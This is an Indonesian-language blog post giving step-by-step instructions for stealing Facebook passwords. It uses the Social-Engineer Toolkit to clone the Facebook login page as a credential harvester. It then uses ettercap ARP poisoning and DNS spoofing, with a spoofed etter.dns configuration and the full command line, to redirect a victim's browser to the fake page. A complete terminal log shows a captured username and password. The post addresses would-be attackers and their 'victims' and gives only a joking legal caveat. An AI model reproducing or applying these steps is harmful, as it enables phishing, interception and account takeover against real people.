Kamis, 11 Juli 2013

Hack Facebook Account Password With Set Tool


SET(Social Engineering Tools) adalah salah satu program open source yang secara default telah terinstall pada Sistem Operasi BackTrack. Dengan menggunakan tool social engineering ini kita dapat melancarkan beberapa serangan hacking, tapi pada article kali ini saya akan membagikan cara mendapatkan password account facebook menggunakan SET Tools.

Begin


1. Buka Social Engineering Tools > Set
2. Select from menu > Select Website Attack Vectors. Anda bisa melihat keterangan-keteranga modulnya.
3. Kemudian Select Credential Harvester Attack Method
4. Pada tahap ini Select Site Cloner
5. Sekarang kita Ketikan https//:www.facebook.com
6. Tinggal menunggu aja sih korban membuka IP Address anda.
|wkwkwkww|,, mana ada yang mau login ke facebook truss pake IP Address milik orang lain(tidak menggunakan domain facebook.com, kecuali dia tidak tahu kalau dia sedang dibohongi.:D Ingat Indonesia adalah negara hukum, jangan sampai anda kena sanksinya.
Ok cara untuk mempermudah agar supaya target login ke facebook tapi sesungguhnya IP Address yang diakses adalah IP address penyerang/anda adalah dengan melakukan Arp Poisoning Attack.

ARP Poisinging With Ettercap
- Open Terminal
- Edit this /usr/share/ettercap/etter.dns
facebook.com      A    198.182.196.56(Change With Your IP Address)
*.facebook.com    A   198.182.196.56((Change With Your IP Address)
www.facebook.com  PTR 198.182.196.56(Change With Your IP Address)
- Save and run it with this command
ettercap -T -q -i (Your Network Interface) -P dns_spoof -M arp /ip target/ /ip gateway/
Dengan begitu setiap kali korban membuka situs facebook akan diarahkan ke Ip Addrees anda. Disaat itu juga pada waktu korban login password dan usernamenya hacker dapatkan.Contohnya :
n3f21t@bt:/pentest/exploits/set# ./set
.M"""bgd `7MM"""YMM MMP""MM""YMM
,MI    "Y   MM    `7 P'   MM   `7
`MMb.       MM   d        MM
`YMMNq.   MMmmMM        MM
.     `MM   MM   Y  ,     MM
Mb     dM   MM     ,M     MM
P"Ybmmd"  .JMMmmmmMMM   .JMML.
[---]       The Social-Engineer Toolkit (SET)          [---]
[---]        Created by: David Kennedy (ReL1K)         [---]
[---]        Development Team: Thomas Werth            [---]
[---]        Development Team: JR DePre (pr1me)        [---]
[---]        Development Team: Joey Furr (j0fer)       [---]
[---]                Version: 2.0.3                    [---]
[---]           Codename: 'Trebuchet Edition'          [---]
[---]        Report bugs to: davek@secmaniac.com       [---]
[---]         Follow me on Twitter: dave_rel1k         [---]
[---]        Homepage: http://www.secmaniac.com        [---]
Welcome to the Social-Engineer Toolkit (SET). Your one
stop shop for all of your social-engineering needs..
DerbyCon 2011 Sep30-Oct02 - http://www.derbycon.com.
Join us on irc.freenode.net in channel #setoolkit
Select from the menu:
1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) SMS Spoofing Attack Vector
8) Wireless Access Point Attack Vector
9) Third Party Modules
10) Update the Metasploit Framework
11) Update the Social-Engineer Toolkit
12) Help, Credits, and About
99) Exit the Social-Engineer Toolkit
set > 2
The Web Attack module is  a unique way of utilizing multiple web-based attacks
in order to compromise the intended victim.
The Java Applet Attack method will spoof a Java Certificate and deliver a
metasploit based payload. Uses a customized java applet created by Thomas
Werth to deliver the payload.
The Metasploit Browser Exploit method will utilize select Metasploit
browser exploits through an iframe and deliver a Metasploit payload.
The Credential Harvester method will utilize web cloning of a web-
site that has a username and password field and harvest all the
information posted to the website.
The TabNabbing method will wait for a user to move to a different
tab, then refresh the page to something different.
The Man Left in the Middle Attack method was introduced by Kos and
utilizes HTTP REFERER's in order to intercept fields and harvest
data from them. You need to have an already vulnerable site and in-
corporate <script src="http://YOURIP/">. This could either be from a
compromised site or through XSS.
The Web-Jacking Attack method was introduced by white_sheep, Emgent
and the Back|Track team. This method utilizes iframe replacements to
make the highlighted URL link to appear legitimate however when clicked
a window pops up then is replaced with the malicious link. You can edit
the link replacement settings in the set_config if its too slow/fast.
The Multi-Attack method will add a combination of attacks through the web attack
menu. For example you can utilize the Java Applet, Metasploit Browser,
Credential Harvester/Tabnabbing, and the Man Left in the Middle attack
all at once to see which is successful.
1) Java Applet Attack Method
2) Metasploit Browser Exploit Method
3) Credential Harvester Attack Method
4) Tabnabbing Attack Method
5) Man Left in the Middle Attack Method
6) Web Jacking Attack Method
7) Multi-Attack Web Method
8) Create or import a CodeSigning Certificate
99) Return to Main Menu
set:webattack > 3
The first method will allow SET to import a list of pre-defined web
applications that it can utilize within the attack.
The second method will completely clone a website of your choosing
and allow you to utilize the attack vectors within the completely
same web application you were attempting to clone.
The third method allows you to import your own website, note that you
should only have an index.html when using the import website
functionality.
1) Web Templates
2) Site Cloner
3) Custom Import
99) Return to Webattack Menu
set:webattack > 2
[-] Email harvester will allow you to utilize the clone capabilities within SET
[-] to harvest credentials or parameters from a website as well as place them into a report
set:webattack > Your interface IP Address: 10.238.88.127
[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com
set:webattack > Enter the url to clone: http://www.facebook.com
[*] Cloning the website: https://login.facebook.com/login.php
[*] This could take a little bit...
The best way to use this attack is if username and password form
fields are available. Regardless, this captures all POSTs on a website.
[*] I have read the above message. [*]
Press {return} to continue.*
[*] Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80
[*] Information will be displayed to you as it arrives below:
10.238.88.127 - - [21/Oct/2011 22:24:15] "GET / HTTP/1.1" 200 -
[*] WE GOT A HIT! Printing the output:
PARAM: charset_test=€,´,€,´,水,Д,Є
PARAM: lsd=
PARAM: return_session=0
PARAM: legacy_return=1
PARAM: display=
PARAM: session_key_only=0
PARAM: trynum=1
PARAM: charset_test=€,´,€,´,水,Д,Є
PARAM: lsd=
POSSIBLE USERNAME FIELD FOUND: email=cmd.nefrit@facebook.com
POSSIBLE PASSWORD FIELD FOUND: pass=Tes+Password
PARAM: default_persistent=0
POSSIBLE USERNAME FIELD FOUND: login=Masuk
[*] WHEN YOUR FINISHED, HIT CONTROL-C TO GENERATE A REPORT.

0 komentar:

Blogroll

Diberdayakan oleh Blogger.

Label

Affiliates

Alexa Stats

Review

Ads